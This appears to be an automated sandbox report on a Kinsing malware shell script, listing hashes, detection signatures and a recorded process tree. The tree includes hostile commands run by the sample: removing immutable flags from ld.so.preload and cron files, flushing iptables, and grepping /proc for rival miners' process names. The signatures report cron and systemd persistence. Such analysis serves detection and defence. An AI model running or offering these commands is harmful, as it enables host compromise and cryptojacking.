Analysis
-
max time kernel
124s -
max time network
89s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23/02/2025, 18:49
Static task
static1
Behavioral task
behavioral1
Sample
lh.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
lh.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
lh.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
lh.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
lh.sh
-
Size
15KB
-
MD5
3e05d09841a8168c2cab04a4ec85a02b
-
SHA1
99c6e8a79d5a2b0aa1e3dfd6d2505bcd5034d6f2
-
SHA256
76d6321fc2da5222a00d8b255f399d74d9399d596729281e82a3db219bf55a68
-
SHA512
316dbcabb7e1f07e3122c103b871d40c510439cb88b087dd7f711b9f3be2545c0751aa4b4ad27349fa4df11e45af23cfd2883871310f268af57eb067f6164026
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJw7:trgXux7YJDj8OoJw7
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload lh.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1721 chmod 1694 chmod 1696 chmod 1705 chmod 1707 chmod 1712 chmod 1714 chmod 1720 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1722 lh.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 723 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1442 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 713 chattr 1480 xargs 1602 xargs 1608 xargs 1618 sed 1644 xargs 1661 xargs 1528 xargs 1564 xargs 1603 sed 1605 xargs 1609 sed 720 chattr 1490 xargs 1501 xargs 1626 xargs 1627 sed 1649 xargs 1496 xargs 1558 xargs 1597 sed 1611 xargs 1621 sed 1624 sed 1629 xargs 1672 xargs 1451 uname 1533 xargs 1552 xargs 1612 sed 1614 xargs 1620 xargs 1688 xargs 1506 xargs 1540 xargs 1546 xargs 1596 xargs 1606 sed 1516 xargs 1475 xargs 1511 xargs 1599 xargs 1600 sed 1630 sed 718 chattr 1485 xargs 1521 xargs 1623 xargs 1632 xargs 1683 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.xvIxw5 crontab File opened for modification /var/spool/cron/crontabs/tmp.UwYkYv crontab File opened for modification /var/spool/cron/crontabs/tmp.4UOTNb crontab File opened for modification /var/spool/cron/crontabs/tmp.sxIQ2r crontab File opened for modification /var/spool/cron/crontabs/tmp.U76ljJ crontab File opened for modification /var/spool/cron/crontabs/tmp.TU9tSd crontab File opened for modification /var/spool/cron/crontabs/tmp.BREbac crontab File opened for modification /var/spool/cron/crontabs/tmp.uNfuNd crontab File opened for modification /var/spool/cron/crontabs/tmp.5FgCa2 crontab File opened for modification /var/spool/cron/crontabs/tmp.CrkMod crontab File opened for modification /var/spool/cron/crontabs/tmp.skYYZw crontab File opened for modification /var/spool/cron/crontabs/tmp.ldUHoe crontab File opened for modification /var/spool/cron/crontabs/tmp.FjmJMk crontab File opened for modification /var/spool/cron/crontabs/tmp.8wcybj crontab File opened for modification /var/spool/cron/crontabs/tmp.JSxR9N crontab File opened for modification /var/spool/cron/crontabs/tmp.m4Pe62 crontab File opened for modification /var/spool/cron/crontabs/tmp.IsTqbo crontab File opened for modification /var/spool/cron/crontabs/tmp.4GfhgX crontab File opened for modification /var/spool/cron/crontabs/tmp.ELTTEn crontab File opened for modification /var/spool/cron/crontabs/tmp.Hmwes1 crontab File opened for modification /var/spool/cron/crontabs/tmp.AqpVoA crontab File opened for modification /var/spool/cron/crontabs/tmp.F2LpPF crontab File opened for modification /var/spool/cron/crontabs/tmp.sw0GcA crontab File opened for modification /var/spool/cron/crontabs/tmp.Hg21Y0 crontab File opened for modification /var/spool/cron/crontabs/tmp.koC6Ga crontab File opened for modification /var/spool/cron/crontabs/tmp.ulGzTT crontab File opened for modification /var/spool/cron/crontabs/tmp.I5zI8B crontab File opened for modification /var/spool/cron/crontabs/tmp.6z4myf crontab File opened for modification /var/spool/cron/crontabs/tmp.fsHT2t crontab File opened for modification /var/spool/cron/crontabs/tmp.dpJrw2 crontab File opened for modification /var/spool/cron/crontabs/tmp.3lWv4z crontab File opened for modification /var/spool/cron/crontabs/tmp.Q7AkT4 crontab File opened for modification /var/spool/cron/crontabs/tmp.Vz8JSz crontab File opened for modification /var/spool/cron/crontabs/tmp.dN4aXB crontab File opened for modification /var/spool/cron/crontabs/tmp.JmDK50 crontab File opened for modification /var/spool/cron/crontabs/tmp.hQQ1Os crontab File opened for modification /var/spool/cron/crontabs/tmp.WYhhmy crontab File opened for modification /var/spool/cron/crontabs/tmp.qsugEr crontab File opened for modification /var/spool/cron/crontabs/tmp.psPn8H crontab File opened for modification /var/spool/cron/crontabs/tmp.CgCxFU crontab File opened for modification /var/spool/cron/crontabs/tmp.AfytdG crontab File opened for modification /var/spool/cron/crontabs/tmp.QmIaMU crontab File opened for modification /var/spool/cron/crontabs/tmp.Sh6ZHd crontab File opened for modification /var/spool/cron/crontabs/tmp.TEMvPh crontab File opened for modification /var/spool/cron/crontabs/tmp.xsA8l6 crontab File opened for modification /var/spool/cron/crontabs/tmp.3PWjJF crontab File opened for modification /var/spool/cron/crontabs/tmp.iWN3m5 crontab File opened for modification /var/spool/cron/crontabs/tmp.3JgnxM crontab File opened for modification /var/spool/cron/crontabs/tmp.Kyp87v crontab File opened for modification /var/spool/cron/crontabs/tmp.ROOG2r crontab File opened for modification /var/spool/cron/crontabs/tmp.NEDNji crontab File opened for modification /var/spool/cron/crontabs/tmp.H1wpw2 crontab File opened for modification /var/spool/cron/crontabs/tmp.v6mQBq crontab File opened for modification /var/spool/cron/crontabs/tmp.q9S6Xy crontab File opened for modification /var/spool/cron/crontabs/tmp.Wvv4xJ crontab File opened for modification /var/spool/cron/crontabs/tmp.TlQEeM crontab File opened for modification /var/spool/cron/crontabs/tmp.GPefuH crontab File opened for modification /var/spool/cron/crontabs/tmp.QyTV3N crontab File opened for modification /var/spool/cron/crontabs/tmp.FXH0ar crontab File opened for modification /var/spool/cron/crontabs/tmp.SiEWf9 crontab File opened for modification /var/spool/cron/crontabs/tmp.HL3IcH crontab File opened for modification /var/spool/cron/crontabs/tmp.BQJMu9 crontab File opened for modification /var/spool/cron/crontabs/tmp.FQyEgd crontab File opened for modification /var/spool/cron/crontabs/tmp.Wr0MMr crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service lh.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1497 ps 1502 ps 1517 ps 1524 ps 1640 ps 1645 ps 1684 ps 1507 ps 1512 ps 1529 ps 1592 ps 1492 ps -
description ioc Process File opened for reading /proc/36/status ps File opened for reading /proc/708/status pkill File opened for reading /proc/5/status pkill File opened for reading /proc/363/stat ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/676/cmdline ps File opened for reading /proc/172/status pkill File opened for reading /proc/uptime ps File opened for reading /proc/self/stat ps File opened for reading /proc/tty/drivers ps File opened for reading /proc/71/status ps File opened for reading /proc/12/status ps File opened for reading /proc/352/stat ps File opened for reading /proc/667/cmdline pkill File opened for reading /proc/705/status pkill File opened for reading /proc/358/stat ps File opened for reading /proc/81/status pkill File opened for reading /proc/367/cmdline pkill File opened for reading /proc/707/cmdline pkill File opened for reading /proc/75/cmdline pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/self/maps awk File opened for reading /proc/110/cmdline pkill File opened for reading /proc/1/status pkill File opened for reading /proc/667/status pkill File opened for reading /proc/671/cmdline ps File opened for reading /proc/78/status pkill File opened for reading /proc/37/status pkill File opened for reading /proc/667/cmdline pkill File opened for reading /proc/73/status pkill File opened for reading /proc/170/stat ps File opened for reading /proc/708/status ps File opened for reading /proc/71/stat ps File opened for reading /proc/78/stat ps File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/11/status pkill File opened for reading /proc/110 ls File opened for reading /proc/676/cmdline ps File opened for reading /proc/73/status pkill File opened for reading /proc/80/status pkill File opened for reading /proc/416/status pkill File opened for reading /proc/70/stat ps File opened for reading /proc/676/cmdline pkill File opened for reading /proc/121/cmdline pkill File opened for reading /proc/20/stat ps File opened for reading /proc/1/status pkill File opened for reading /proc/17/status pkill File opened for reading /proc/2/cmdline pkill File opened for reading /proc/358/cmdline pkill File opened for reading /proc/705/status ps File opened for reading /proc/1683/stat ps File opened for reading /proc/37/stat ps File opened for reading /proc/3/cmdline pkill File opened for reading /proc/707/cmdline pkill File opened for reading /proc/37/status pkill File opened for reading /proc/10/status pkill File opened for reading /proc/7/status ps File opened for reading /proc/687/status pkill File opened for reading /proc/14/cmdline ps File opened for reading /proc/24/cmdline pkill File opened for reading /proc/155/cmdline pkill File opened for reading /proc/121/cmdline pkill File opened for reading /proc/676/cmdline pkill File opened for reading /proc/4/status pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1390 ls 1827 sed
Processes
-
/tmp/lh.sh/tmp/lh.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:708 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:713
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:716
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:718
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:720
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:723
-
-
/bin/lsls -latrh /proc/12⤵PID:731
-
-
/bin/grepgrep exe2⤵PID:732
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/grepgrep exe2⤵PID:742
-
-
/bin/lsls -latrh /proc/102⤵PID:741
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:745
-
-
/bin/grepgrep exe2⤵PID:748
-
-
/bin/lsls -latrh /proc/112⤵PID:747
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:752
-
-
/bin/grepgrep exe2⤵PID:755
-
-
/bin/lsls -latrh /proc/1102⤵
- Reads runtime system information
PID:754
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:757
-
-
/bin/grepgrep exe2⤵PID:762
-
-
/bin/lsls -latrh /proc/122⤵PID:761
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:765
-
-
/bin/grepgrep exe2⤵PID:768
-
-
/bin/lsls -latrh /proc/1202⤵PID:767
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:771
-
-
/bin/grepgrep exe2⤵PID:774
-
-
/bin/lsls -latrh /proc/1212⤵PID:773
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:776
-
-
/bin/grepgrep exe2⤵PID:780
-
-
/bin/lsls -latrh /proc/132⤵PID:779
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:782
-
-
/bin/lsls -latrh /proc/142⤵PID:784
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/lsls -latrh /proc/152⤵PID:789
-
-
/bin/grepgrep exe2⤵PID:790
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/grepgrep exe2⤵PID:795
-
-
/bin/lsls -latrh /proc/1512⤵PID:794
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:797
-
-
/bin/lsls -latrh /proc/1552⤵PID:799
-
-
/bin/grepgrep exe2⤵PID:800
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:805
-
-
/bin/lsls -latrh /proc/162⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/grepgrep exe2⤵PID:810
-
-
/bin/lsls -latrh /proc/172⤵PID:809
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:812
-
-
/bin/grepgrep exe2⤵PID:815
-
-
/bin/lsls -latrh /proc/1702⤵PID:814
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:817
-
-
/bin/grepgrep exe2⤵PID:820
-
-
/bin/lsls -latrh /proc/1722⤵PID:819
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:822
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/182⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:827
-
-
/bin/lsls -latrh /proc/192⤵PID:829
-
-
/bin/grepgrep exe2⤵PID:830
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:832
-
-
/bin/lsls -latrh /proc/22⤵PID:834
-
-
/bin/grepgrep exe2⤵PID:835
-
-
